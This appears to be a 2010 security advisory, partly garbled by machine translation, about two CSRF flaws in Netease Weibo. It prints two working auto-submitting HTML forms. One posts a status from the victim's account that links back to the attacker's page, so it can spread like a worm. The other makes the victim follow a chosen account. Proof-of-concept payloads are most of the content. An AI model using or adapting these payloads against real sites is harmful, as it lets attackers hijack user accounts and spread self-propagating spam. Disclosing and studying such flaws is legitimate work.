Netease Weibo CSRF two use-vulnerability warning-the black bar safety net

2010-11-01T00:00:00
ID MYHACK58:62201028231
Type myhack58
Reporter 佚名
Modified 2010-11-01T00:00:00

Description

Does not perform token authentication vulnerable to CSRF attacks

Detailed description:

A malicious attacker may construct a malicious form, and the defrauded victims of the click, when the victim clicks on the link, on behalf of the victim to produce a microblogging information, this method can produce worms, is very serious.

Vulnerability proof:

Test method: 1, The 将 下列 表单 存储 成 index.html put in the local directory,1 8 3. 1 7 4. 3 9. 4 6 replaced with your own ip. <form name="CSRF" method="POST" name="form0" action="http://t.163.com:80/statuses/update.do"> <input type="hidden" name="status" value="http://183.174.39.46/index.html"/> <input type="hidden" name="in_reply_to_status_id" value="sendinfo"/> <input type="hidden" name="dispatchToFollowers" value=""/> </form> <script> document. CSRF. submit(); </script> 2, log on Netease microblogging, 然后访问http://183.174.39.46/index.html 3, the back to own page http://t.163.com/,will be found to have been more of a Twitter message. 4, pay attention to your people if you click on that tweet message, will issue a LIKE microblogging message/

Second, Netease microblogging CSRF exploit 2: automatically add interest, and automatically tweet

Yesterday I put the question to simple, and today tried it, Netease microblogging this CSRF vulnerability can also be automatically added concern. Combined with yesterday that auto-tweet function, the two together will be a very interesting thing. This issue is too serious, I could not help but think as 0day sent out, but in view of national day, you think about it you feel good.

Detailed description:

After login, access the constructed form, you can add“small pan head”for attention.

Vulnerability proof:

<form method="POST" name="CSRF" action="http://t.163.com:80/friendships/create/3198225089.json"> <input type="hidden" name="name" value="value"/> </form> <script> document. CSRF. submit(); </script>